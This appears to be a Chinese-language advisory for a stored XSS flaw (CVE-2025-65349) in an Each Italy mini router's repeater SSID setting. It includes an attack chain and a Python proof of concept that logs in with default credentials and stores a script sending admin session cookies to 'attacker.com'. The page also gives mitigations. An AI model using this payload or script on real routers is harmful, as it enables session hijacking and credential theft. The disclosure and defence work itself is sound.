CVE-2025-65349 Each Italy无线路由器Web管理界面存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-65349

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Each Italy Wireless Mini Router WIRELESS-N 300M v28K.MiniRouter.20190211

漏洞概述

CVE-2025-65349是Each Italy Wireless Mini Router WIRELESS-N 300M路由器Web管理界面中存在的一个存储型跨站脚本（Stored Cross-Site Scripting）漏洞。该漏洞源于Web管理界面在处理repeater AP SSID值时未对用户输入进行充分的输入验证和输出编码。当攻击者通过精心构造的恶意脚本作为SSID值注入到系统中后，该恶意载荷会被永久存储在设备配置中。此后，任何用户访问路由器的Web管理界面任何页面（特别是/ index.htm）时，存储的恶意脚本都会被浏览器执行，从而实现会话劫持、敏感信息窃取、恶意内容注入等攻击目的。由于该漏洞位于路由器Web管理界面，攻击成功后将直接威胁到整个网络的终端设备安全。攻击者利用低权限账号即可实施攻击，且需要用户交互才能触发，但一旦漏洞被利用，将对网络基础设施造成严重安全威胁。

技术细节

该存储型XSS漏洞存在于Each Italy Wireless Mini Router的Web管理界面中，具体位于repeater AP SSID配置功能模块。漏洞产生的根本原因是应用程序在接收用户输入后，未对特殊字符进行HTML实体编码或移除，导致攻击者可以注入任意JavaScript代码。当存储型XSS漏洞被触发时，攻击者可以执行以下操作：1）窃取用户会话Cookie，通过document.cookie获取当前用户的认证信息；2）重定向用户到恶意网站，修改window.location.href进行钓鱼攻击；3）在页面中注入虚假表单，窃取管理员凭据；4）修改页面内容进行社工攻击。攻击者首先需要使用低权限账号登录路由器Web管理界面，然后导航至repeater AP SSID配置页面，在SSID字段中注入恶意JavaScript代码（如<script>alert(document.cookie)</script>）并保存配置。由于该值被存储在设备配置中，恶意脚本将在后续任何用户访问管理界面时自动执行，形成持久性攻击。

攻击链分析

STEP 1

步骤1

攻击者使用低权限账号（如admin/admin）登录路由器Web管理界面

STEP 2

步骤2

攻击者导航至repeater AP SSID配置页面

STEP 3

步骤3

攻击者在SSID输入字段中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>

STEP 4

步骤4

攻击者提交并保存配置，恶意载荷被永久存储在设备配置中

STEP 5

步骤5

当任何用户访问路由器Web管理界面任何页面（特别是/ index.htm）时，存储的恶意脚本自动执行

STEP 6

步骤6

恶意脚本窃取用户Cookie、会话信息或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-65349 PoC - Stored XSS in Each Italy Router
# Target: Each Italy Wireless Mini Router WIRELESS-N 300M
# Vulnerability: Stored XSS via repeater AP SSID field

TARGET_IP = "192.168.1.1"
USERNAME = "admin"
PASSWORD = "admin"

# Malicious payload - Cookie stealing XSS
XSS_PAYLOAD = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'

def exploit_stored_xss():
    """
    This PoC demonstrates the stored XSS vulnerability in the router's
    repeater AP SSID configuration. The payload is stored persistently
    and executed when any page is visited.
    """
    # Step 1: Login to router web interface
    login_url = f"http://{TARGET_IP}/login.cgi"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    
    session = requests.Session()
    login_response = session.post(login_url, data=login_data)
    
    if login_response.status_code != 200:
        print("[-] Login failed")
        return False
    
    print("[+] Login successful")
    
    # Step 2: Inject XSS payload into repeater AP SSID field
    ssid_url = f"http://{TARGET_IP}/repeater_ssid.cgi"
    ssid_data = {
        "ap_ssid": XSS_PAYLOAD,
        "apply": "Apply"
    }
    
    inject_response = session.post(ssid_url, data=ssid_data)
    
    if inject_response.status_code == 200:
        print("[+] XSS payload injected successfully")
        print(f"[+] Payload stored: {XSS_PAYLOAD}")
        print("[+] Payload will execute on any page visit at /index.htm")
        return True
    else:
        print("[-] Failed to inject payload")
        return False

if __name__ == "__main__":
    exploit_stored_xss()

影响范围

Each Italy Wireless Mini Router WIRELESS-N 300M v28K.MiniRouter.20190211

防御指南

临时缓解措施

在厂商发布修复补丁之前，建议采取以下临时缓解措施：1）禁用路由器的Web管理界面远程访问，仅允许通过本地网络访问；2）使用强密码策略，定期更换路由器管理密码；3）监控Web管理界面的访问日志，及时发现异常请求；4）限制可访问Web管理界面的IP地址范围；5）考虑使用VPN连接后再访问路由器管理界面；6）定期检查路由器配置，确认是否存在异常SSID设置。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65349
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65349
3 Details https://www.cvedetails.com/cve/CVE-2025-65349/
4 VulDB https://vuldb.com/cve/CVE-2025-65349
5 Link https://github.com/5ulfur/security-advisories/tree/main/CVE-2025-65349
6 Link https://imgur.com/a/X9DNOBj